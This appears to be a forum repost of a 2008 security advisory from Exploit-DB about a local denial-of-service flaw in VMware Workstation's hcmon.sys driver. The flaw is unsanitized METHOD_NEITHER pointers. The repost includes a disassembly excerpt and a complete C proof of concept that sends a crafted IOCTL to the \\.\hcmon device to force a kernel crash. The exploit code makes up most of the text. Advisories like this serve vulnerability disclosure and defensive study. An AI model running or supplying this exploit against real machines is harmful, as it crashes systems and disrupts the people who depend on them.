Exploit VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6262
Проверка EDB
  1. Пройдено
Автор
G_
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-3761
Дата публикации
2008-08-18
Код:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name             : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class            : DoS
Published       : 2008-08-17
Credit        : g_ (g_ # orange-bat # com)

- - Details -

Fails to sanitize pointers sent from usermode with METHOD_NEITHER.

hcmon.sys:

.text:00011606 loc_11606:                             .text:00011606                 mov     eax, [ebp+SystemBuffer]
.text:00011609                 mov     [ebp+SystemBuffer2], eax
.text:0001160C                 mov     ecx, [ebp+SystemBuffer2]
.text:0001160F                 mov     edx, [ecx+0Ch]       <---- BUGCHECK
.text:00011612                 cmp     edx, [ebp+var_20]
.text:00011615                 jnz     short loc_11629
.text:00011617                 cmp     [ebp+NumberOfBytes], 70h
.text:0001161B                 jb      short loc_11629
.text:0001161D                 mov     eax, [ebp+SystemBuffer2]
.text:00011620                 cmp     dword ptr [eax+8], 7FFBh
.text:00011627                 jbe     short loc_11638

This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon
device.

- - Proof of concept -

#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>


void TextError(LPTSTR lpszFunction)
{
   // Retrieve the system error message for the last-error code

   LPVOID lpMsgBuf;
   LPVOID lpDisplayBuf;
   DWORD dw = GetLastError();

   FormatMessage(
       FORMAT_MESSAGE_ALLOCATE_BUFFER |
       FORMAT_MESSAGE_FROM_SYSTEM |
       FORMAT_MESSAGE_IGNORE_INSERTS,
       NULL,
       dw,
       MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
       (LPTSTR) &lpMsgBuf,
       0, NULL );

   // Display the error message and exit the process

   lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,
       (lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40) \
       *sizeof(TCHAR));
   sprintf((LPTSTR)lpDisplayBuf,
       TEXT("%s failed with error %d: %s"),
       lpszFunction, dw, lpMsgBuf);
   //MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);

   printf(lpDisplayBuf);

   LocalFree(lpMsgBuf);
   LocalFree(lpDisplayBuf);
}


BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, \
        DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
 HANDLE hDevice;               // handle to the drive to be examined
 BOOL bResult;                 // results flag
 DWORD junk;                   // discard results
 IO_STATUS_BLOCK  IoStatusBlock;

 hDevice = CreateFile(DeviceName,
                   0,                // no access to the drive
                   FILE_SHARE_READ | // share mode
                   FILE_SHARE_WRITE,
                   NULL,             // default security attributes
                   OPEN_EXISTING,    // disposition
                   0,                // file attributes
                   NULL);            // do not copy file attributes

 if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive
 {
    TextError("CreateFile");
   return (FALSE);
 }


 bResult = DeviceIoControl(hDevice,  // device to be queried
                             Ioctl,
                           (PVOID)InputBuffer,
                           InputLen,
                           (PVOID)OutputBuffer,
                           OutputLen,     // output buffer
                           &junk,                 // # bytes returned
                           (LPOVERLAPPED)NULL);  // synchronous I/O


 if(!bResult){
      TextError("DeviceIoControl");
 }

 CloseHandle(hDevice);

 return TRUE;
}

int main(int argc, char *argv[])
{
    DWORD Ioctl, Input, ILen, Output, OLen;
    DWORD SSDT;
    char *ptr;

    if(TestIOCTL("\\\\.\\hcmon", 0x8101232B, 0x80000001, 0, 0x80000002, 0)){
        printf("You should not see this");
    }
    else{
        printf("Failed to open device");
    }


     return 0;
}


- - PGP -

All advisories from Orange Bat are signed. You can find our public
key here: http://www.orange-bat.com/g_.asc

- - Disclaimer -

This document and all the information it contains is provided "as is",
without any warranty. Orange Bat is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.

(c) 2008 www.orange-bat.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70

iEYEARECAAYFAkioiW4ACgkQIUHRVUfOLgUQEQCdE1YYpJAUypShf5oStwMfbRRC
BPMAniLYABIgCgxkZVSQAQawV060P4M8
=cp6A
-----END PGP SIGNATURE-----

# milw0rm.com [2008-08-18]
 
Источник
www.exploit-db.com

Похожие темы